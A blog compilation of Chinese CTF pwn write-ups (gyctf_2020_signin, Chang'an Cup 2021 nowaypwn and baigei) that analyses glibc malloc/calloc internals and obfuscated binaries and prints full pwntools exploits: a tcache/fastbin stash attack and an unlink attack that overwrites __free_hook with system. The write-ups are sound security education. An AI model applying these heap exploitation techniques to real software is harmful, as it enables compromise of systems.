gyctf_2020_signin

info
License
本文引用了部分来自 GNU C Library 的源码,源码取自 GNU C Library 基于 LGPLv2.1

注:本题目的运行环境使用的 glibc 为 2.27-3ubuntu1_amd64,但本文中展示的所有 glibc 代码为 2.34

WriteUp-gyctf_2020_signin

看到本文的各位师傅,请允许 Y7n05h 又翻出这段各位都熟悉无比的代码.能够发现从非空的 tcache 中取出 chunk 是在 __libc_malloc() 中完成的,而非在 _int_malloc_() 中.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
void *
__libc_malloc (size_t bytes)
{
mstate ar_ptr;
void *victim;

_Static_assert (PTRDIFF_MAX <= SIZE_MAX / 2,
"PTRDIFF_MAX is not more than half of SIZE_MAX");

if (!__malloc_initialized)
ptmalloc_init ();
#if USE_TCACHE
/* int_free also calls request2size, be careful to not pad twice. */
size_t tbytes;
if (!checked_request2size (bytes, &tbytes))
{
__set_errno (ENOMEM);
return NULL;
}
size_t tc_idx = csize2tidx (tbytes);

MAYBE_INIT_TCACHE ();

DIAG_PUSH_NEEDS_COMMENT;
if (tc_idx < mp_.tcache_bins
&& tcache
&& tcache->counts[tc_idx] > 0)
{
victim = tcache_get (tc_idx);
return tag_new_usable (victim);
}
DIAG_POP_NEEDS_COMMENT;
#endif

if (SINGLE_THREAD_P)
{
victim = tag_new_usable (_int_malloc (&main_arena, bytes));
assert (!victim || chunk_is_mmapped (mem2chunk (victim)) ||
&main_arena == arena_for_chunk (mem2chunk (victim)));
return victim;
}

arena_get (ar_ptr, bytes);

victim = _int_malloc (ar_ptr, bytes);
/* Retry with another arena only if we were able to find a usable arena
before. */
if (!victim && ar_ptr != NULL)
{
LIBC_PROBE (memory_malloc_retry, 1, bytes);
ar_ptr = arena_get_retry (ar_ptr, bytes);
victim = _int_malloc (ar_ptr, bytes);
}

if (ar_ptr != NULL)
__libc_lock_unlock (ar_ptr->mutex);

victim = tag_new_usable (victim);

assert (!victim || chunk_is_mmapped (mem2chunk (victim)) ||
ar_ptr == arena_for_chunk (mem2chunk (victim)));
return victim;
}

再看 __libc_calloc()

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
void *
__libc_calloc (size_t n, size_t elem_size)
{
mstate av;
mchunkptr oldtop;
INTERNAL_SIZE_T sz, oldtopsize;
void *mem;
unsigned long clearsize;
unsigned long nclears;
INTERNAL_SIZE_T *d;
ptrdiff_t bytes;

if (__glibc_unlikely (__builtin_mul_overflow (n, elem_size, &bytes)))
{
__set_errno (ENOMEM);
return NULL;
}

sz = bytes;

if (!__malloc_initialized)
ptmalloc_init ();

MAYBE_INIT_TCACHE ();

if (SINGLE_THREAD_P)
av = &main_arena;
else
arena_get (av, sz);

if (av)
{
/* Check if we hand out the top chunk, in which case there may be no
need to clear. */
#if MORECORE_CLEARS
oldtop = top (av);
oldtopsize = chunksize (top (av));
# if MORECORE_CLEARS < 2
/* Only newly allocated memory is guaranteed to be cleared. */
if (av == &main_arena &&
oldtopsize < mp_.sbrk_base + av->max_system_mem - (char *) oldtop)
oldtopsize = (mp_.sbrk_base + av->max_system_mem - (char *) oldtop);
# endif
if (av != &main_arena)
{
heap_info *heap = heap_for_ptr (oldtop);
if (oldtopsize < (char *) heap + heap->mprotect_size - (char *) oldtop)
oldtopsize = (char *) heap + heap->mprotect_size - (char *) oldtop;
}
#endif
}
else
{
/* No usable arenas. */
oldtop = 0;
oldtopsize = 0;
}
mem = _int_malloc (av, sz);

assert (!mem || chunk_is_mmapped (mem2chunk (mem)) ||
av == arena_for_chunk (mem2chunk (mem)));

if (!SINGLE_THREAD_P)
{
if (mem == 0 && av != NULL)
{
LIBC_PROBE (memory_calloc_retry, 1, sz);
av = arena_get_retry (av, sz);
mem = _int_malloc (av, sz);
}

if (av != NULL)
__libc_lock_unlock (av->mutex);
}

/* Allocation failed even after a retry. */
if (mem == 0)
return 0;

mchunkptr p = mem2chunk (mem);

/* If we are using memory tagging, then we need to set the tags
regardless of MORECORE_CLEARS, so we zero the whole block while
doing so. */
if (__glibc_unlikely (mtag_enabled))
return tag_new_zero_region (mem, memsize (p));

INTERNAL_SIZE_T csz = chunksize (p);

/* Two optional cases in which clearing not necessary */
if (chunk_is_mmapped (p))
{
if (__builtin_expect (perturb_byte, 0))
return memset (mem, 0, sz);

return mem;
}

#if MORECORE_CLEARS
if (perturb_byte == 0 && (p == oldtop && csz > oldtopsize))
{
/* clear only the bytes from non-freshly-sbrked memory */
csz = oldtopsize;
}
#endif

/* Unroll clear of <= 36 bytes (72 if 8byte sizes). We know that
contents have an odd number of INTERNAL_SIZE_T-sized words;
minimally 3. */
d = (INTERNAL_SIZE_T *) mem;
clearsize = csz - SIZE_SZ;
nclears = clearsize / sizeof (INTERNAL_SIZE_T);
assert (nclears >= 3);

if (nclears > 9)
return memset (d, 0, clearsize);

else
{
*(d + 0) = 0;
*(d + 1) = 0;
*(d + 2) = 0;
if (nclears > 4)
{
*(d + 3) = 0;
*(d + 4) = 0;
if (nclears > 6)
{
*(d + 5) = 0;
*(d + 6) = 0;
if (nclears > 8)
{
*(d + 7) = 0;
*(d + 8) = 0;
}
}
}
}

return mem;
}

相信各位都能发现 __libc_calloc()__libc_malloc() 的差别是很小的,通常情况下将 __libc_calloc() 视为 __libc_malloc() + memset() 是合理的.但除此之外还有一点区别是 __libc_calloc() 中缺少从非空的 tcache 取出 chunk 的部分,因此 calloc() 将优先从 fastbin 中分配 chunk

这也是本题目的利用的核心思路.

错误思路-tcache poisoning

Y7n05h 刚开始也是想采用 tcache poisoning 来完成本题,并寄希望与 free/malloc 的过程中能清除 cnt 实现第二次 edit.但很遗憾,此路并不通.通过此方式虽能将 chunk 分配在 ptr 上,但无法修改 ptr 的值.(至少 Y7n05h 没想到)

正确思路

此方式是从 Pwnki 师傅 的博客学来的.在这里感谢 Pwnki 师傅 师傅.

利用思路:

  1. 分配 8 个大小为 0x80 的 chunk 后全部 free,前 7 个塞满了 tcache,后一个进入 fastbin
  2. 在分配一个 chunk,这将从 tcache 中取出一个 chunk
  3. 修改在 1 中放入的 fastbin 中的 chunk 的 fd 的指针为 ptr - 0x10,注意这个行为使 glibc 认为 ptr - 0x10 是一个 chunk,则 ptr 则是这个 chunkfd
  4. 通过执行 backdoor,调用 callocfastbin 取出 chunk 并将其 fd 指向的 ptr - 0x10 作为一个 chunk 插入 tcache 链表.插入过程中 ptr 将作为 tcache_entrynext 字段被修改.

这些过程的相关代码:

1
2
3
4
5
6
typedef struct tcache_entry
{
struct tcache_entry *next;
/* This field exists to detect double frees. */
uintptr_t key;
} tcache_entry;
1
2
3
4
5
6
7
8
9
10
11
12
#define REMOVE_FB(fb, victim, pp)			\
do \
{ \
victim = pp; \
if (victim == NULL) \
break; \
pp = REVEAL_PTR (victim->fd); \
if (__glibc_unlikely (pp != NULL && misaligned_chunk (pp))) \
malloc_printerr ("malloc(): unaligned fastbin chunk detected"); \
} \
while ((pp = catomic_compare_and_exchange_val_acq (fb, pp, victim)) \
!= victim); \
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
     /* While we're here, if we see other chunks of the same size,
stash them in the tcache. */
size_t tc_idx = csize2tidx (nb);
if (tcache && tc_idx < mp_.tcache_bins)
{
mchunkptr tc_victim;

/* While bin not empty and tcache not full, copy chunks. */
while (tcache->counts[tc_idx] < mp_.tcache_count
&& (tc_victim = *fb) != NULL)
{
if (__glibc_unlikely (misaligned_chunk (tc_victim)))
malloc_printerr ("malloc(): unaligned fastbin chunk detected 3");
if (SINGLE_THREAD_P)
*fb = REVEAL_PTR (tc_victim->fd);
else
{
REMOVE_FB (fb, pp, tc_victim);
if (__glibc_unlikely (tc_victim == NULL))
break;
}
tcache_put (tc_victim, tc_idx);
}
}

完整 exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
from pwn import *
path = '/home/admin/Downloads/gyctf_2020_signin'
elf = ELF(path)
r = process(path)


def i2b(n: int, Hex: bool = False):
return bytes(hex(n) if Hex else str(n), encoding="ascii")


def backdoor():
r.sendafter(b"?", b'6')


def add(idx: int):
r.sendafter(b"?", b'1')
r.sendafter(b"idx?\n", i2b(idx))


def delete(idx: int):
r.sendafter(b"?", b'3')
r.sendafter(b"idx?\n", i2b(idx))


def edit(idx: int, content: bytes):
r.sendafter(b"?", b'2')
r.sendafter(b"idx?\n", i2b(idx))
r.send(content)


addr = elf.symbols['ptr']-0x10
for i in range(8):
add(i)
for i in range(8):
delete(i)

add(8)
payload = p64(addr)
edit(7, payload)

backdoor()
r.interactive()

参考资料

1. Pwnki-gyctf_2020_signin.
2. PYozo_free-gyctf_2020_signin.

WriteUp-长安杯2021-决赛 AWD-nowaypwn

Y7n05h 非常激动能有机会(虽然是以替补的身份)参加长安杯 2021 决赛.这是 Y7n05h 第一次参加 CTF 线下赛,因为缺少经验,Y7n05h 犯了不少错误.在本文中,Y7n05h 将复盘比赛时的行为.
同时也感谢「摸一把」战队的大师傅,指出了 Y7n05h 的指点.
在 AWD 赛制中,Y7n05h 对没有做出这道 nowaypwn 十分的遗憾.

现在就让 Y7n05h 重新审视一下这道题目,看看它究竟考察了什么吧.

warning
免责声明

本文所述 PWN 均属 CTF(Capture The Flag)参赛行为或赛前训练行为.笔者所 PWN 的对象均为 CTF 比赛或练习中平台方提供的靶机.
本文意在分享网络安全与 CTF 相关技术与技巧,共同提升实力.
请本文读者谨记相关法律法规与政策.读者需为自身行为承担相应的法律后果.笔者(Y7n05h)不为读者的行为承担责任.

基本分析

1
2
3
4
5
6
7
8
9
10
11
12
13
pwn/nowaypwn
filetype: ELF64
arch: AMD64
mode: 64 bits
endianess: LE
type: EXEC
library: GLIBC(2.4)[EXEC AMD64-64]
compiler: gcc((Ubuntu 5.3.1-14ubuntu2) 5.3.1 20160413)[EXEC AMD64-64]
RELRO STACK CANARY NX PIE RPATH RUNPATH Symbols FORTIFY Fortified Fortifiable FILE
Partial RELRO Canary found NX enabled No PIE No RPATH No RUNPATH No Symbols No 0 2 /home/admin/pwn/nowaypwn
linux-vdso.so.1 (0x00007ffc85dee000)
libc.so.6 => /usr/lib/libc.so.6 (0x00007fd505212000)
/lib64/ld-linux-x86-64.so.2 => /usr/lib64/ld-linux-x86-64.so.2 (0x00007fd5053fd000)

题目提供的 libc 附件的版本是 2.23-0ubuntu11.3_amd64SHA-1 为:eb4e85135a8dfe60c1f5bfb704b1e5cfde24a0b8(大概是这个,文件弄乱了,Y7n05h 对此不是非常确定).

逆向工程分析

虽说这是一道 PWN 题,但在 Y7n05h 看来这道题的最重要的部分不是 PWN,而是逆向工程.本题的 PWN 部分十分简单,出题人在逆向工程部分设下了多个障碍.下面就听 Y7n05h 逐一说明.

下面是 IDA 生成的伪码.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
__int64 __fastcall sub_400BFD(unsigned int *a1)
{
__int64 result; // rax
int i; // [rsp+1Ch] [rbp-3Ch]
unsigned int v3; // [rsp+20h] [rbp-38h]
unsigned int v4; // [rsp+24h] [rbp-34h]
unsigned int v5; // [rsp+28h] [rbp-30h]
int v6[6]; // [rsp+38h] [rbp-20h]
unsigned __int64 v7; // [rsp+50h] [rbp-8h]

v7 = __readfsqword(0x28u);
v6[0] = 674697780;
v6[1] = 422065475;
v6[2] = 423118625;
v6[3] = -1741216238;
v3 = *a1;
v4 = a1[1];
v5 = 0;
for ( i = 0; i <= 31; ++i )
{
v3 += (((v4 >> 5) ^ (16 * v4)) + v4) ^ (v6[v5 & 3] + v5);
v5 -= 1640531527;
v4 += (((v3 >> 5) ^ (16 * v3)) + v3) ^ (v6[(v5 >> 11) & 3] + v5);
}
*a1 = v3;
result = v4;
a1[1] = v4;
return result;
}
_BOOL8 __fastcall sub_400DB8(_BYTE *a1)
{
sub_400BFD(a1);
return *a1 == 20
&& a1[1] == 92
&& a1[2] == 0xA6
&& a1[3] == 0xD2
&& a1[4] == 14
&& a1[5] == 69
&& a1[6] == 9
&& a1[7] == 119;
}
__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
__int64 result; // rax
char v4[16]; // [rsp+18h] [rbp-50h] BYREF
char buf[16]; // [rsp+28h] [rbp-40h] BYREF
char v6[40]; // [rsp+38h] [rbp-30h] BYREF
unsigned __int64 v7; // [rsp+60h] [rbp-8h]

v7 = __readfsqword(0x28u);
sub_40091D(a1, a2, a3);
puts("Happy to see you darling!");
puts("Give me your name:");
read(0, buf, 0x10uLL);
puts("Give me your key:");
read(0, v4, 0x20uLL);
puts("Now start the game!");
do
{
puts("Input your password!:");
read(0, v6, 0x2CuLL);
result = sub_400DB8(v6);
}
while ( (_DWORD)result != 1 );
return result;
}

Y7n05h 在伪码中没有找到任何漏洞.

难道这是个栈题,漏洞存在于 sub_400BFD() 里面吗?

通过 IDA 插件 Findcrypt 得到 TEA_DELTA_400C64 的内容.通过搜索引擎得知 TEA 加密算法.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
uint32_t delta = 0x9e3779b9;//常数 可更改

void tea_encrypt(uint32_t s[2], const uint32_t key[4]) {


uint32_t l = s[0];
uint32_t r = s[1];
uint32_t sum = 0;
for (int i = 0; i < 32; ++i) {
l += (((r >> 5) ^ (r << 4)) + r) ^ (key[sum & 3] + sum);
sum += delta;
r += (((l >> 5) ^ (l << 4)) + l) ^ (key[(sum >> 11) & 3] + sum);
}
s[0] = l;
s[1] = r;
}
void tea_decrypt(uint32_t v[2], const uint32_t key[4]) {
uint32_t l = v[0], r = v[1];

uint32_t sum = delta << 5;
for (int i = 0; i < 32; i++) {
r -= (((l << 4) ^ (l >> 5)) + l) ^ (sum + key[(sum >> 11) & 3]);
sum -= delta;
l -= (((r << 4) ^ (r >> 5)) + r) ^ (sum + key[sum & 3]);
}
v[0] = l;
v[1] = r;
}

通过,对比 tea_encrypt()sub_400BFD(),Y7n05h 认为 sub_400BFD() 就是使用 TEA 算法加密一个 64 bits 的分组的函数.

噢,或许会有读者觉得:

tea_encrypt() 中是:

1
sum += delta;

sub_400BFD() 中是:

1
v5 -= 1640531527;

这两处不但数值不同,而且一处为加法,一处为减法,怎么能说 sub_400BFD()tea_encrypt() 等价呢?

有这样的顾虑的读者,请别忘了,有符号整形采用二进制补码存储,因此减去 1640531527 也就是加上 0x9e3779b9.

因此,Y7n05h 认为这两个函数完全等价(这个结论在当前是正确的),也就是说 sub_400BFD()TEA 加密算法的一种实现,那么就能得知 sub_400BFD() 加密的内容可用 tea_decrypt() 解密.

先别急着去解密密文,别忘了这是 PWN 题,不是逆向题,那么漏洞在哪里呢?Y7n05h 并没有找到.

在紧张的 AWD 比赛中,Y7n05h 对此题没有更多的进展了.在 Y7n05h 发现自己做不出此题后,Y7n05h 决定先开始防御.Y7n05h 写出了下面的代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
#include <stdio.h>
#include <unistd.h>
int main(void) {
setvbuf(stderr, NULL, _IONBF, 0);
setvbuf(stdin, NULL, _IONBF, 0);
setvbuf(stdout, NULL, _IONBF, 0);
char buf[0x50];
puts("Happy to see you darling!");
puts("Give me your name:");
read(0, buf, 0x10uLL);
puts("Give me your key:");
read(0, buf, 0x20uLL);
puts("Now start the game!");
do {
puts("Input your password!:");
read(0, buf, 0x2CuLL);
} while (1);
}

为了防止别的队伍 PWN 掉 Y7n05h 的靶机,Y7n05h 编译了上面的代码,替换了靶机中的程序.Y7n05h 看了看比赛平台上并未将靶机判为宕机状态,于是 Y7n05h 知道这样的改动通过了 check.(「摸一把」战队的大师傅在赛后告诉 Y7n05h 这是比赛方设置的 check 过于宽松,在多数的比赛中 check 将检查原程序与靶机上运行的程序的大小差异,差异过大不能通过 check)Y7n05h 这样的改动通过了 checks 纯属侥幸,请各位读者 不要 学习.

那么使用密钥(v6 的前 128 bits,也就是下面的 key):

1
2
3
4
5
uint32_t key[4] =
{0x28371234,
0x19283543,
0x19384721,
0x98372612};

解密密文分组:

1
uint8_t message[9] = {0x14, 0x5c, 0xa6, 0xd2, 0x0e, 0x45, 0x09, 0x77};

通过 pwntools 将得到的明文分组,在程序中输入,得到密码输入错误的提示.

Y7n05h 尝试提取 sub_400BFD() 的伪码修改并编译,输入上面获得的明文分组和密钥,成功的得到了密文分组.
Y7n05h 又去尝试使用 gdb 追踪 sub_400BFD() 的解密过程,发现 sub_400BFD() 结束后,得到了不同于预期的密文分组.

这真是一件令 Y7n05h 感到费解的事!使用 tea_decrypt() 解密密文得到的明文,输入至 tea_encrypt() 或 IDA 中复制出的 sub_400BFD() 能得到相同的密文分组,但若输入至 nowaypwn 程序中,则能得到异于前面的 tea_encrypt() 的输出的密文分组.

这真是奇怪!Y7n05h 开始思考是不是 sub_400BFD() 中是不是存在 C 语言中的 Undefined Behavior 导致了不同的执行结果.

就在 Y7n05h 试图对比通过编译 sub_400BFD() 伪码得到的汇编代码与反汇编 nowaypwn 得到的汇编代码时,发现:

1
2
3
4
.text:0000000000400CF2                 call    $+5
.text:0000000000400CF7 add [rsp+58h+var_58], 6
.text:0000000000400CFC retn
.text:0000000000400CFC sub_400BFD endp ; sp-analysis failed

IDA 的报错是因为这里存在花指令,Y7n05h 在这里贴出的部分全都是用于干扰反汇编、反编译工具的花指令,有兴趣知道这些指令为什么能干扰反汇编、反编译工具的读者可以通过 GDB 追踪这三个指令的执行.

通过 IDApatch 功能将这些花指令改为 nop,然后使用 IDA 重新分析程序即可得到完整的 sub_400BFD() 伪码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
unsigned __int64 __fastcall sub_400BFD(unsigned int *a1)
{
int i; // [rsp+14h] [rbp-3Ch]
int j; // [rsp+14h] [rbp-3Ch]
unsigned int v4; // [rsp+18h] [rbp-38h]
unsigned int v5; // [rsp+18h] [rbp-38h]
unsigned int v6; // [rsp+1Ch] [rbp-34h]
unsigned int v7; // [rsp+1Ch] [rbp-34h]
unsigned int v8; // [rsp+20h] [rbp-30h]
unsigned int v9; // [rsp+20h] [rbp-30h]
unsigned int v10; // [rsp+24h] [rbp-2Ch]
unsigned int v11; // [rsp+28h] [rbp-28h]
int v12[6]; // [rsp+30h] [rbp-20h]
unsigned __int64 v13; // [rsp+48h] [rbp-8h]

v13 = __readfsqword(0x28u);
v10 = *a1;
v11 = a1[1];
v12[0] = 674697780;
v12[1] = 422065475;
v12[2] = 423118625;
v12[3] = -1741216238;
v4 = *a1;
v6 = a1[1];
v8 = 0;
for ( i = 0; i <= 31; ++i )
{
v4 += (((v6 >> 5) ^ (16 * v6)) + v6) ^ (v12[v8 & 3] + v8);
v8 -= 1640531527;
v6 += (((v4 >> 5) ^ (16 * v4)) + v4) ^ (v12[(v8 >> 11) & 3] + v8);
}
*a1 = v4;
a1[1] = v6;
v5 = v10;
v7 = v11;
v9 = 0;
for ( j = 0; j <= 8; ++j )
{
v5 += (((v7 >> 5) ^ (16 * v7)) + v7) ^ (v12[v9 & 3] + v9);
v9 += 0x19286521;
v7 += (((v5 >> 5) ^ (16 * v5)) + v5) ^ (v12[(v9 >> 11) & 3] + v9);
}
*a1 = v5;
a1[1] = v7;
return __readfsqword(0x28u) ^ v13;
}

通过分析这段伪码就能发现,TEA 算法生成的密文分组并未被使用,程序中真正使用的是另一个加密算法.最终,可知这是 XTEA 算法.
这是 Y7n05h 通过搜索找到的 XTEA 算法实现.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
#include <stdint.h>
#define delta 0x9E3779B9U//常量 可更改
void encrypt(unsigned int num_rounds, uint32_t v[2], uint32_t const key[4]) {
uint32_t v0 = v[0], v1 = v[1], sum = 0;
for (int i = 0; i < num_rounds; i++) {
v0 += (((v1 << 4) ^ (v1 >> 5)) + v1) ^ (sum + key[sum & 3]);
sum += delta;
v1 += (((v0 << 4) ^ (v0 >> 5)) + v0) ^ (sum + key[(sum >> 11) & 3]);
}
v[0] = v0;
v[1] = v1;
}

void decrypt(unsigned int num_rounds, uint32_t v[2], uint32_t const key[4]) {
uint32_t v0 = v[0], v1 = v[1], sum = delta * num_rounds;
for (int i = 0; i < num_rounds; i++) {
v1 -= (((v0 << 4) ^ (v0 >> 5)) + v0) ^ (sum + key[(sum >> 11) & 3]);
sum -= delta;
v0 -= (((v1 << 4) ^ (v1 >> 5)) + v1) ^ (sum + key[sum & 3]);
}
v[0] = v0;
v[1] = v1;
}

通过对比能确认这里使用的算法就是修改了 delta 常量的 XTEA 算法.

其实不但这里(0x400CF2)有花指令,在 0x400EEE0x400B44 也有花指令,patch 掉这些花指令之后,使用 IDA 重新生成伪码,就能清晰的看到漏洞所在:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
ssize_t Edit()
{
ssize_t result; // rax
unsigned __int64 Idx; // [rsp+8h] [rbp-8h]

Idx = get_Idx();
if ( Idx > 0x10 || !Arr[2 * Idx] || !Size[2 * Idx] )
exit(0);
read(0, Arr[2 * Idx], Size[2 * Idx]);
result = Size[2 * Idx];
if ( result == 0x66 )
return read(0, Arr[2 * Idx], 0x80uLL);
return result;
}

这里的溢出过于刻意,相信所有人在 patch 掉这些花指令之后都能十分容易的发现这里的漏洞.

漏洞利用

在得到完整的伪码后,就能知道,本题目使用的加密算法是修改了常数的 XTEA 算法.修改 XTEA 的解密算法的常数后,解密得到:skdmaje1

根据伪码写出:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
from pwn import *
context(log_level='debug', os='linux', arch='amd64')

path = '/home/admin/pwn/nowaypwn'
libcpath = '/home/admin/pwn/libc.so.6'

libc = ELF(libcpath)
elf = ELF(path)
r = process(path)

passwd = b'skdmaje1'

r.sendafter(":\n", b'123') # name
r.sendafter(":\n", b'123') # key
r.sendafter(":\n", passwd) # passwd


def up6(addr_port: bytes):
log.debug("get bytes"+addr_port.hex())
recvlen = len(addr_port)
log.debug("recv len "+hex(recvlen))
assert(recvlen == 6)

return u64(addr_port.ljust(8, b"\x00"))


def i2b(n: int, Hex: bool = False):
return bytes(hex(n) if Hex else str(n), encoding="ascii")


def Alloc(size: int):
r.sendline(b'1')
r.sendline(i2b(size))


def Delete(idx: int):
r.sendline(b'2')
r.sendline(i2b(idx))


def Edit(idx: int, content: bytes):
r.sendline(b'3')
r.sendline(i2b(idx))
r.send(content)


def Show(idx: int):
r.sendline(b'4')
r.sendline(i2b(idx))


def Get_pr(idx: int):
return 0x6020C0+idx*0x10

由于本题并未开启 PIE,Y7n05h 选择使用 Unlink 去完成本题目.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
Alloc(0x30)  # 0
Alloc(0x30) # 1
Alloc(0x66) # 2
Alloc(0x100) # 3
Alloc(0x10) # 4

Edit(0, b'/bin/sh\x00')

Edit(2, cyclic(0x66))
chunk2_pr = Get_pr(2)
payload = flat(0, 0x21, chunk2_pr-0x18, chunk2_pr -
0x10, 0x20).ljust(0x60)+flat(0x60, 0x110)
r.send(payload) # size 为 0x66 触发再次读取,产生溢出

# Unlink
Delete(3)

payload = flat(8, elf.got['puts'], 0x8, Get_pr(1), 8)
Edit(2, payload)
r.send(p64(elf.got['puts'])) # size 为 0x66 触发再次读取

Show(1)
puts_addr = up6(r.recv(6))
libc_base = puts_addr-libc.symbols['puts']
free_hook_addr = libc.symbols['__free_hook']+libc_base
system_addr = libc.symbols['system']+libc_base
payload = p64(free_hook_addr)
Edit(2, payload)
Edit(1, p64(system_addr))
Delete(0)
r.interactive()

因为本题的 PWN 部分十分简单,Y7n05h 就不解释 exp 的每行的作用了.

最后,再次感谢「摸一把」战队的大师傅,Y7n05h 在比赛中没找到漏洞点,有花指令隐藏了漏洞点是 Y7n05h 赛后从「摸一把」战队的大师傅那里得知的.

WriteUp-长安杯2021-baigei

warning
免责声明

本文所述 PWN 均属 CTF(Capture The Flag)参赛行为或赛前训练行为.笔者所 PWN 的对象均为 CTF 比赛或练习中平台方提供的靶机.
本文意在分享网络安全与 CTF 相关技术与技巧,共同提升实力.
请本文读者谨记相关法律法规与政策.读者需为自身行为承担相应的法律后果.笔者(Y7n05h)不为读者的行为承担责任.

基本分析

1
2
3
4
5
6
7
8
9
10
11
12
filetype: ELF64
arch: AMD64
mode: 64
endianess: LE
type: DYN
library: GLIBC(2.4)[DYN AMD64-64]
compiler: gcc((Ubuntu 7.5.0-3ubuntu1~18.04) 7.5.0)[DYN AMD64-64]
RELRO STACK CANARY NX PIE RPATH RUNPATH Symbols FORTIFY Fortified Fortifiable FILE
Full RELRO Canary found NX enabled PIE enabled No RPATH No RUNPATH No Symbols No 0 2 /home/admin/Downloads/baige/main
linux-vdso.so.1 (0x00007fff7d9f8000)
libc.so.6 => /usr/lib/libc.so.6 (0x00007f6e75d5f000)
/lib64/ld-linux-x86-64.so.2 => /usr/lib64/ld-linux-x86-64.so.2 (0x00007f6e7614b000)

题目提供的 libc 附件的版本是 2.27-3ubuntu1.4_amd64SHA-1 为:46e93283ff53133360e02a73ae5b5ba375410855

程序分析

下面是通过逆向工程分析得到的伪码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
int Memu()
{
puts("1.Allocate");
puts("2.Delete");
puts("3.Edit");
puts("4.Show");
puts("5.Exit");
return puts(">>");
}
int read_Int()
{
char buf[40]; // [rsp+0h] [rbp-30h] BYREF
unsigned __int64 v2; // [rsp+28h] [rbp-8h]

v2 = __readfsqword(0x28u);
buf[(int)read(0, buf, 0x10uLL)] = 0;
return atoi(buf);
}
int Alloc()
{
unsigned int idx; // [rsp+0h] [rbp-10h]
int nbytes; // [rsp+4h] [rbp-Ch]
void *pr; // [rsp+8h] [rbp-8h]

puts("idx?");
idx = read_Int();
if ( idx > 0xF )
return puts("error!");
puts("size?");
nbytes = read_Int();
Size_Arr[idx] = nbytes;
if ( nbytes > 1024 )
return puts("error!");
pr = malloc(nbytes);
if ( !pr )
return puts("error!");
Pr_Arr[idx] = pr;
puts("content?");
read(0, Pr_Arr[idx], (unsigned int)nbytes);
return puts("success!");
}
int Delete()
{
unsigned int v1; // [rsp+Ch] [rbp-4h]

puts("idx?");
v1 = read_Int();
if ( v1 > 0xF || !Pr_Arr[v1] )
return puts("error!");
free(Pr_Arr[v1]);
Pr_Arr[v1] = 0LL;
return puts("success!");
}
int Edit()
{
unsigned int v1; // [rsp+8h] [rbp-8h]
int nbytes; // [rsp+Ch] [rbp-4h]

puts("idx?");
v1 = read_Int();
if ( v1 > 0xF )
return puts("error!");
if ( !Pr_Arr[v1] )
return puts("error!");
puts("size?");
nbytes = read_Int();
if ( nbytes <= 0 || nbytes >= (unsigned __int64)Size_Arr[v1] )
return puts("error!");
puts("content?");
read(0, Pr_Arr[v1], (unsigned int)nbytes);
return puts("success!");
}
int Show()
{
unsigned int v1; // [rsp+Ch] [rbp-4h]

puts("idx?");
v1 = read_Int();
if ( v1 > 0xF || !Pr_Arr[v1] )
return puts("error!");
printf("%d : %s\n", v1, (const char *)Pr_Arr[v1]);
return puts("success!");
}
void __fastcall main(int a1, char **a2, char **a3)
{
setbuf(stdout, 0LL);
setbuf(stdin, 0LL);
setbuf(stderr, 0LL);
while ( 1 )
{
Memu();
switch ( read_Int() )
{
case 1:
Alloc();
break;
case 2:
Delete();
break;
case 3:
Edit();
break;
case 4:
Show();
break;
case 5:
exit(0);
default:
exit(0);
}
}
}

除了代码之外,全局变量的内存分布如下:

1
2
3
4
5
6
7
8
.bss:0000000000202060 ; __int64 Size_Arr[16]
.bss:0000000000202060 Size_Arr dq 10h dup(?) ; DATA XREF: Alloc+55↑o
.bss:0000000000202060 ; Edit+7A↑o
.bss:00000000002020E0 ; void *Pr_Arr[16]
.bss:00000000002020E0 Pr_Arr dq 10h dup(?) ; DATA XREF: Alloc+AB↑o
.bss:00000000002020E0 ; Alloc+D1↑o ...
.bss:00000000002020E0 _bss ends
.bss:00000000002020E0

漏洞定位

本题的漏洞还是有些隐蔽的.
相信各位师傅在做本题的时候一定会关注 Edit()

1
2
3
4
if ( nbytes <= 0 || nbytes >= (unsigned __int64)Size_Arr[v1] )
return puts("error!");
puts("content?");
